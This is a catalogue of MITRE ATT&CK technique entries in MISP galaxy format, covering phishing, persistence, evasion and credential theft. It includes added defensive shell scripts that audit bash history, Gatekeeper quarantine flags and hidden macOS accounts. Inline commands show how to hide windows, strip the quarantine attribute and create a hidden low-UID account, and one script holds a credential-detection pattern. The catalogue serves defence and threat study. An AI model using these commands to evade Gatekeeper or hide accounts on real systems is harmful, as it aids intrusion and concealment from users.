Table 6253. Table References

Links

https://attack.mitre.org/techniques/T1182

https://forum.sysinternals.com/appcertdlls_topic12546.html

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Spearphishing Link - T1192

Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1192"

Table 6254. Table References

Links

https://attack.mitre.org/techniques/T1192

https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks

https://capec.mitre.org/data/definitions/163.html

Shared Modules - T1129

Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).

Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, adversaries can modularize functionality of their malware into shared objects that perform various functions such as managing C2 network communications or execution of specific actions on objective.

The Linux & macOS module loader can load and execute shared objects from arbitrary local paths. This functionality resides in dlfcn.h in functions such as dlopen and dlsym. Although macOS can execute .so files, common practice uses .dylib files.(Citation: Apple Dev Dynamic Libraries)(Citation: Linux Shared Libraries)(Citation: RotaJakiro 2021 netlab360 analysis)(Citation: Unit42 OceanLotus 2017)

The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like LoadLibrary at run time.(Citation: Microsoft DLL)

The tag is: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129"

Table 6255. Table References

Links

https://attack.mitre.org/techniques/T1129

https://blog.netlab.360.com/stealth_rotajakiro_backdoor_en/

https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html

https://learn.microsoft.com/troubleshoot/windows-client/deployment/dynamic-link-library

https://tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html

https://unit42.paloaltonetworks.com/unit42-new-improved-macos-backdoor-oceanlotus/

Obfuscate infrastructure - T1331

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1331).

Obfuscation is hiding the day-to-day building and testing of new tools, chat servers, etc. (Citation: FireEyeAPT17)

The tag is: misp-galaxy:mitre-attack-pattern="Obfuscate infrastructure - T1331"

Obfuscate infrastructure - T1331 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscate infrastructure - T1309" with estimative-language:likelihood-probability="almost-certain"

Table 6256. Table References

Links

https://attack.mitre.org/techniques/T1331

Hidden Window - T1143

Adversaries may implement hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks. Adversaries may abuse operating system functionality to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.

Windows

There are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1086), JScript, and VBScript to make windows hidden. One example of this is <code>powershell.exe -WindowStyle Hidden</code>. (Citation: PowerShell About 2019)

Mac

The configurations for how applications run on macOS are listed in property list (plist) files. One of the tags in these files can be <code>apple.awt.UIElement</code>, which allows for Java applications to prevent the application’s icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don’t also want to show up in the Dock. However, adversaries can abuse this feature and hide their running window.(Citation: Antiquated Mac Malware)

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Window - T1143"

Table 6257. Table References

Links

https://attack.mitre.org/techniques/T1143

https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/

https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1

Screen Capture - T1513

Adversaries may use screen capture to collect additional information about a target device, such as applications running in the foreground, user data, credentials, or other sensitive information. Applications running in the background can capture screenshots or videos of another application running in the foreground by using the Android MediaProjectionManager (generally requires the device user to grant consent).(Citation: Fortinet screencap July 2019)(Citation: Android ScreenCap1 2019) Background applications can also use Android accessibility services to capture screen contents being displayed by a foreground application.(Citation: Lookout-Monokle) An adversary with root access or Android Debug Bridge (adb) access could call the Android screencap or screenrecord commands.(Citation: Android ScreenCap2 2019)(Citation: Trend Micro ScreenCap July 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513"

Table 6258. Table References

Links

https://attack.mitre.org/techniques/T1513

https://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/

https://developer.android.com/reference/android/media/projection/MediaProjectionManager

https://developer.android.com/studio/command-line/adb

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-40.html

https://www.fortinet.com/blog/threat-research/new-wave-bianlian-malware.html

https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf

Create Account - T1136

Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.

Accounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.

The tag is: misp-galaxy:mitre-attack-pattern="Create Account - T1136"

Table 6259. Table References

Links

https://attack.mitre.org/techniques/T1136

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720

Process Injection - T1631

Adversaries may inject code into processes in order to evade process-based defenses or even elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

Neither Android nor iOS provides a legitimate way to achieve process injection. The only way this is possible is by abusing existing root access or exploiting a vulnerability.

The tag is: misp-galaxy:mitre-attack-pattern="Process Injection - T1631"

Table 6260. Table References

Links

https://attack.mitre.org/techniques/T1631

Application Shimming - T1138

The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that they will work with Windows 10. (Citation: Elastic Process Injection July 2017) Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses [Hooking](https://attack.mitre.org/techniques/T1179) to redirect the code as necessary in order to communicate with the OS.

A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:

  • <code>%WINDIR%\AppPatch\sysmain.sdb</code>

  • <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb</code>

Custom databases are stored in:

  • <code>%WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom</code>

  • <code>hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom</code>

To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel, and administrator privileges are required to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) (UAC) (RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structured Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress). Similar to [Hooking](https://attack.mitre.org/techniques/T1179), utilizing these shims may allow an adversary to perform several malicious acts such as elevating privileges, installing backdoors, disabling defenses like Windows Defender, etc.

The tag is: misp-galaxy:mitre-attack-pattern="Application Shimming - T1138"

Table 6261. Table References

Links

https://attack.mitre.org/techniques/T1138

https://www.blackhat.com/docs/eu-15/materials/eu-15-Pierce-Defending-Against-Malicious-Application-Compatibility-Shims-wp.pdf

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Authentication attempt - T1381

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Attempt to use default vendor credentials, brute force credentials, or previously obtained legitimate credentials to authenticate remotely. This access could be to a web portal, through a VPN, or in a phone app. (Citation: Remote Access Healthcare) (Citation: RDP Point of Sale)

The tag is: misp-galaxy:mitre-attack-pattern="Authentication attempt - T1381"

Table 6262. Table References

Links

https://attack.mitre.org/techniques/T1381

Spearphishing Attachment - T1193

Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.

There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary’s payload exploits a vulnerability or directly executes on the user’s system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.

The tag is: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1193"

Table 6263. Table References

Links

https://attack.mitre.org/techniques/T1193

https://capec.mitre.org/data/definitions/163.html

Bash History - T1139

Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)
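A defender-side check for this technique, added here as an example and not part of the MISP galaxy page or ATT&CK: scan a bash history file for commands that embed credentials, so the exposed secrets can be rotated. The pattern list and the sample history are constructed for the example and are a starting set, not an exhaustive detector.

```shell
#!/bin/sh
# Added example (not from the MISP galaxy page): audit a bash history file for
# commands that embed credentials, so that the exposed secrets can be rotated
# and the habit corrected. CRED_PATTERN is a constructed starting set.

CRED_PATTERN='sshpass +-p|--password[= ]|mysql[^|;]* -p[^ ]|curl[^|;]* -u +[^ :]+:[^ ]+|(password|secret|token|api_key)[a-z_]*=|authorization: *bearer'

# history_credential_hits [FILE]: print "lineno:command" for each suspect line.
# Defaults to the calling user's ~/.bash_history (the path named on the page).
history_credential_hits() {
    file="${1:-$HOME/.bash_history}"
    if [ ! -r "$file" ]; then
        echo "cannot read $file" >&2
        return 2
    fi
    # grep exits 1 when nothing matches; that is not an error for an audit.
    grep -E -i -n "$CRED_PATTERN" "$file" || true
}

# Constructed sample history (not from a real host); four of the seven lines
# carry a credential on the command line.
SAMPLE_HISTORY='ls -la
mysql -u root -pS3cretPass inventory
mkdir -p /tmp/build
curl -u admin:hunter2 https://intranet.example/api/health
export AWS_SECRET_ACCESS_KEY=EXAMPLEKEYVALUE
git status
sshpass -p letmein ssh deploy@build01.example'

# count_sample_hits: number of suspect lines found in the constructed sample.
count_sample_hits() {
    tmp=$(mktemp)
    printf '%s\n' "$SAMPLE_HISTORY" > "$tmp"
    history_credential_hits "$tmp" | wc -l | tr -d ' '
    rm -f "$tmp"
}
```

Run `history_credential_hits` with no argument on a host to audit the current user's history; note that `mkdir -p` is deliberately not matched, because a bare `-p` is far too common to be a useful signal. Beyond rotating anything found, the mitigation is to stop secrets reaching the file in the first place (prompting for passwords instead of passing them as arguments, or `HISTCONTROL=ignorespace` for one-off commands).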

The tag is: misp-galaxy:mitre-attack-pattern="Bash History - T1139"

Table 6264. Table References

Links

http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way

https://attack.mitre.org/techniques/T1139

Gatekeeper Bypass - T1144

In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called <code>com.apple.quarantine</code>. This attribute is read by Apple’s Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution.

Apps loaded onto the system from a USB flash drive, optical disk, external hard drive, or even from a drive shared over the local network won’t set this flag. Additionally, other utilities or events like drive-by downloads don’t necessarily set it either. This completely bypasses the built-in Gatekeeper check. (Citation: Methods of Mac Malware Persistence) The presence of the quarantine flag can be checked by the xattr command <code>xattr /path/to/MyApp.app</code> for <code>com.apple.quarantine</code>. Similarly, given sudo access or elevated permission, this attribute can be removed with xattr as well, <code>sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app</code>. (Citation: Clearing quarantine attribute) (Citation: OceanLotus for OS X)

In typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, Gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will prompt the user to confirm that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application. (Citation: Bypassing Gatekeeper)
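The following shell functions, added here as an example and not part of the MISP galaxy page or ATT&CK, turn the xattr check described above into a small triage helper: they decode the value of <code>com.apple.quarantine</code> and report when a file carries no flag at all (the case where Gatekeeper will not prompt). The decoding assumes the attribute's documented-by-observation layout of four semicolon-separated fields (hex flags, hex UNIX download timestamp, downloading agent, LaunchServices record UUID); the sample value is constructed.

```shell
#!/bin/sh
# Added example (not from the MISP galaxy page): decode the com.apple.quarantine
# attribute and report files that Gatekeeper will not prompt for.
# The attribute value looks like "0083;5f3c1a2b;Safari;<UUID>":
#   field 1  hex flags
#   field 2  hex UNIX timestamp of the download
#   field 3  name of the agent (browser, mail client, ...) that set the flag
#   field 4  LaunchServices record UUID (may be empty)

# quarantine_field VALUE N: print field N (1-based) of the record.
quarantine_field() {
    printf '%s\n' "$1" | cut -d ';' -f "$2"
}

# quarantine_agent VALUE: the application that applied the flag.
quarantine_agent() {
    quarantine_field "$1" 3
}

# quarantine_epoch VALUE: download time as a decimal UNIX timestamp.
quarantine_epoch() {
    hex=$(quarantine_field "$1" 2)
    echo $(( 0x$hex ))
}

# quarantine_status VALUE: one-line summary; an empty VALUE means the file has
# no quarantine flag, so Gatekeeper will not step in when it is opened.
quarantine_status() {
    if [ -z "$1" ]; then
        echo "not quarantined"
    else
        echo "quarantined: agent=$(quarantine_agent "$1") epoch=$(quarantine_epoch "$1") flags=$(quarantine_field "$1" 1)"
    fi
}

# check_file PATH: on a real macOS host, read the attribute with xattr
# (xattr -p prints only the value) and summarise it. Needs macOS to run.
check_file() {
    quarantine_status "$(xattr -p com.apple.quarantine "$1" 2>/dev/null)"
}
```

On a Mac, `check_file /path/to/MyApp.app` prints either the decoding or `not quarantined`; the latter on a freshly downloaded app is worth a closer look, since it means the file either arrived through a channel that never sets the flag or had the attribute stripped as described above.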

The tag is: misp-galaxy:mitre-attack-pattern="Gatekeeper Bypass - T1144"

Table 6265. Table References

Links

https://attack.mitre.org/techniques/T1144

https://blog.malwarebytes.com/cybercrime/2015/10/bypassing-apples-gatekeeper/

https://derflounder.wordpress.com/2012/11/20/clearing-the-quarantine-extended-attribute-from-downloaded-applications/

https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Clipboard Data - T1414

Adversaries may abuse clipboard manager APIs to obtain sensitive information copied to the device clipboard. For example, passwords being copied and pasted from a password manager application could be captured by a malicious application installed on the device.(Citation: Fahl-Clipboard)

On Android, applications can use the ClipboardManager.OnPrimaryClipChangedListener() API to register as a listener and monitor the clipboard for changes. However, starting in Android 10, this can only be used if the application is in the foreground, or is set as the device’s default input method editor (IME).(Citation: Github Capture Clipboard 2019)(Citation: Android 10 Privacy Changes)

On iOS, this can be accomplished by accessing the UIPasteboard.general.string field. However, starting in iOS 14, upon accessing the clipboard, the user will be shown a system notification if the accessed text originated in a different application. For example, if the user copies the text of an iMessage from the Messages application, the notification will read “application_name has pasted from Messages” when the text was pasted in a different application.(Citation: UIPPasteboard)

The tag is: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1414"

Table 6266. Table References

Links

http://saschafahl.de/static/paper/pwmanagers2013.pdf

https://attack.mitre.org/techniques/T1414

https://developer.android.com/about/versions/10/privacy/changes#clipboard-data

https://developer.apple.com/documentation/uikit/uipasteboard

https://github.com/grepx/android-clipboard-security

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-35.html

Foreground Persistence - T1541

Adversaries may abuse Android’s startForeground() API method to maintain continuous sensor access. Beginning in Android 9, idle applications running in the background no longer have access to device sensors, such as the camera, microphone, and gyroscope.(Citation: Android-SensorsOverview) Applications can retain sensor access by running in the foreground, using Android’s startForeground() API method. This informs the system that the user is actively interacting with the application, and it should not be killed. The only requirement to start a foreground service is showing a persistent notification to the user.(Citation: Android-ForegroundServices)

Malicious applications may abuse the startForeground() API method to continue running in the foreground, while presenting a notification to the user pretending to be a genuine application. This would allow unhindered access to the device’s sensors, assuming permission has been previously granted.(Citation: BlackHat Sutter Android Foreground 2019)

Malicious applications may also abuse the startForeground() API to inform the Android system that the user is actively interacting with the application, thus preventing it from being killed by the low memory killer.(Citation: TrendMicro-Yellow Camera)

The tag is: misp-galaxy:mitre-attack-pattern="Foreground Persistence - T1541"

Table 6267. Table References

Links

https://attack.mitre.org/techniques/T1541

https://blog.trendmicro.com/trendlabs-security-intelligence/fake-photo-beautification-apps-on-google-play-can-read-sms-verification-code-to-trigger-wireless-application-protocol-wap-carrier-billing/

https://developer.android.com/guide/components/services.html#Foreground

https://developer.android.com/guide/topics/sensors/sensors_overview#sensors-practices

https://i.blackhat.com/eu-19/Thursday/eu-19-Sutter-Simple-Spyware-Androids-Invisible-Foreground-Services-And-How-To-Abuse-Them.pdf

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html

Private Keys - T1145

Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto)

Adversaries may gather private keys from compromised systems for use in authenticating to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk, .p12, .pem, .pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as <code>~/.ssh</code> for SSH keys on *nix-based systems or <code>C:\Users\(username)\.ssh\</code> on Windows.

Private keys should require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line.

Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates. (Citation: Kaspersky Careto) (Citation: Palo Alto Prince of Persia)

The tag is: misp-galaxy:mitre-attack-pattern="Private Keys - T1145"

Table 6268. Table References

Links

https://attack.mitre.org/techniques/T1145

https://en.wikipedia.org/wiki/Public-key_cryptography

https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf

https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/

Lockscreen Bypass - T1461

An adversary with physical access to a mobile device may seek to bypass the device’s lockscreen. Several methods exist to accomplish this, including:

  • Biometric spoofing: If biometric authentication is used, an adversary could attempt to spoof a mobile device’s biometric authentication mechanism. Both iOS and Android partly mitigate this attack by requiring the device’s passcode rather than biometrics to unlock the device after every device restart, and after a set or random amount of time.(Citation: SRLabs-Fingerprint)(Citation: TheSun-FaceID)

  • Unlock code bypass: An adversary could attempt to brute-force or otherwise guess the lockscreen passcode (typically a PIN or password), including physically observing (“shoulder surfing”) the device owner’s use of the lockscreen passcode. Mobile OS vendors partly mitigate this by implementing incremental backoff timers after a set number of failed unlock attempts, as well as a configurable full device wipe after several failed unlock attempts.

  • Vulnerability exploit: Techniques have been periodically demonstrated that exploit mobile devices to bypass the lockscreen. The vulnerabilities are generally patched by the device or OS vendor once disclosed.(Citation: Wired-AndroidBypass)(Citation: Kaspersky-iOSBypass)

The tag is: misp-galaxy:mitre-attack-pattern="Lockscreen Bypass - T1461"

Table 6269. Table References

Links

https://attack.mitre.org/techniques/T1461

https://srlabs.de/bites/spoofing-fingerprints/

https://threatpost.com/ios-10-passcode-bypass-can-access-photos-contacts/122033/

https://www.thesun.co.uk/tech/5584082/iphone-x-face-unlock-tricked-broken/

https://www.wired.com/2015/09/hack-brief-new-emergency-number-hack-easily-bypasses-android-lock-screens/

Data Manipulation - T1641

Adversaries may insert, delete, or alter data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.

The type of modification and the impact it will have depends on the target application, process, and the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system, typically gained through a prolonged information gathering campaign, in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1641"

Table 6270. Table References

Links

https://attack.mitre.org/techniques/T1641

URI Hijacking - T1416

Adversaries may register Uniform Resource Identifiers (URIs) to intercept sensitive data.

Applications regularly register URIs with the operating system to act as a response handler for various actions, such as logging into an app using an external account via single sign-on. This allows redirections to that specific URI to be intercepted by the application. If a malicious application were to register for a URI that was already in use by a genuine application, the malicious application may be able to intercept data intended for the genuine application or perform a phishing attack against the genuine application. Intercepted data may include OAuth authorization codes or tokens that could be used by the malicious application to gain access to resources.(Citation: Trend Micro iOS URL Hijacking)(Citation: IETF-PKCE)

The tag is: misp-galaxy:mitre-attack-pattern="URI Hijacking - T1416"

Table 6271. Table References

Links

https://attack.mitre.org/techniques/T1416

https://blog.trendmicro.com/trendlabs-security-intelligence/ios-url-scheme-susceptible-to-hijacking/

https://tools.ietf.org/html/rfc7636

Input Capture - T1417

Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal device usage, users often provide credentials to various locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. [Keylogging](https://attack.mitre.org/techniques/T1417/001)) or rely on deceiving the user into providing input into what they believe to be a genuine application prompt (e.g. [GUI Input Capture](https://attack.mitre.org/techniques/T1417/002)).

The tag is: misp-galaxy:mitre-attack-pattern="Input Capture - T1417"

Table 6272. Table References

Links

https://attack.mitre.org/techniques/T1417

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html

https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-13.html

Hidden Users - T1147

Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in <code>/Library/Preferences/com.apple.loginwindow</code> called <code>Hide500Users</code> that prevents users with userIDs 500 and lower from appearing at the login screen. By using the [Create Account](https://attack.mitre.org/techniques/T1136) technique with a userID under 500 and enabling this property (setting it to Yes), an adversary can hide their user accounts much more easily: <code>sudo dscl . -create /Users/username UniqueID 401</code> (Citation: Cybereason OSX Pirrit).
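A detection-side counterpart to the technique above, added here as an example and not part of the MISP galaxy page or ATT&CK: list local accounts whose UniqueID is below 500 but which do not look like Apple's own service accounts, and report whether <code>Hide500Users</code> is set. The account list format is that of <code>dscl . -list /Users UniqueID</code>; the sample rows are constructed.

```shell
#!/bin/sh
# Added example (not from the MISP galaxy page): audit macOS local accounts for
# the Hidden Users pattern. Input is "name UniqueID" lines such as those printed
# by `dscl . -list /Users UniqueID`; a constructed sample is included so the
# logic can be exercised off a Mac.

# suspicious_low_uid_users: read "name uid" lines on stdin and print those with
# a UniqueID below 500 that do not look like Apple's own service accounts
# (names beginning with "_", plus root, daemon and nobody).
suspicious_low_uid_users() {
    while read -r name uid; do
        if [ -z "$name" ]; then continue; fi
        case "$name" in
            _*|root|daemon|nobody) continue ;;
        esac
        case "$uid" in
            ''|*[!0-9]*) continue ;;   # skip non-numeric ids (nobody is -2)
        esac
        if [ "$uid" -lt 500 ]; then
            printf '%s %s\n' "$name" "$uid"
        fi
    done
}

# hide500_enabled VALUE: succeed when the value read with
# `defaults read /Library/Preferences/com.apple.loginwindow Hide500Users`
# means the login window hides low-UID accounts.
hide500_enabled() {
    case "$1" in
        1|YES|yes|true|TRUE) return 0 ;;
        *) return 1 ;;
    esac
}

# Constructed sample resembling dscl output (not from a real host).
SAMPLE_USERS='root 0
daemon 1
_mbsetupuser 248
nobody -2
alice 501
bob 502
svc_backup 401'

# audit_sample: run the check over the constructed sample.
audit_sample() {
    printf '%s\n' "$SAMPLE_USERS" | suspicious_low_uid_users
}

# audit_local_mac: the same check on a real macOS host (needs dscl and defaults).
audit_local_mac() {
    dscl . -list /Users UniqueID | suspicious_low_uid_users
    if hide500_enabled "$(defaults read /Library/Preferences/com.apple.loginwindow Hide500Users 2>/dev/null)"; then
        echo "Hide500Users is set: the accounts above will not appear at the login window"
    fi
}
```

On the constructed sample only <code>svc_backup 401</code> is reported, which is exactly the shape of account the <code>dscl . -create ... UniqueID 401</code> command above produces. The service-account exclusion list is an assumption; adjust it to the baseline of the fleet being audited, and treat any non-underscore account below UID 500 that nobody can account for as worth investigating.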

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Users - T1147"

Table 6273. Table References

Links

https://attack.mitre.org/techniques/T1147

https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf

Software Discovery - T1418

Adversaries may attempt to get a listing of applications that are installed on a device. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1418) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempt specific actions.

Adversaries may attempt to enumerate applications for a variety of reasons, such as figuring out what security measures are present or to identify the presence of target applications.

The tag is: misp-galaxy:mitre-attack-pattern="Software Discovery - T1418"

Table 6274. Table References

Links

https://attack.mitre.org/techniques/T1418

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html

SSH Hijacking - T1184

Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.

In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent’s socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial. (Citation: Slideshare Abusing SSH) (Citation: SSHjack Blackhat) (Citation: Clockwork SSH Agent Hijacking) Compromising the SSH agent also provides access to intercept SSH credentials. (Citation: Welivesecurity Ebury SSH)

[SSH Hijacking](https://attack.mitre.org/techniques/T1184) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it injects into an existing SSH session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).

The tag is: misp-galaxy:mitre-attack-pattern="SSH Hijacking - T1184"

Table 6275. Table References

Links

https://attack.mitre.org/techniques/T1184

https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-boileau.pdf

https://www.clockwork.com/news/2012/09/28/602/ssh_agent_hijacking

https://www.slideshare.net/morisson/mistrusting-and-abusing-ssh-13526219

https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/

Web Service - T1481

Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis, or enable operational resiliency (since this infrastructure may be dynamically changed).

The tag is: misp-galaxy:mitre-attack-pattern="Web Service - T1481"

Table 6276. Table References

Links

https://attack.mitre.org/techniques/T1481

LC_MAIN Hijacking - T1149

This technique has been deprecated and should no longer be used.

As of OS X 10.8, Mach-O binaries introduced a new header called LC_MAIN that points to the binary’s entry point for execution. Previously, there were two headers to achieve this same effect: LC_THREAD and LC_UNIXTHREAD (Citation: Prolific OSX Malware History). The entry point for a binary can be hijacked so that initial execution flows to a malicious addition (either another section or a code cave) and then goes back to the initial entry point so that the victim doesn’t know anything was different (Citation: Methods of Mac Malware Persistence). By modifying a binary in this way, application whitelisting can be bypassed because the file name or application path is still the same.

The tag is: misp-galaxy:mitre-attack-pattern="LC_MAIN Hijacking - T1149"

Table 6277. Table References

Links

https://assets.documentcloud.org/documents/2459197/bit9-carbon-black-threat-research-report-2015.pdf

https://attack.mitre.org/techniques/T1149

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Disk Wipe - T1561

Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.

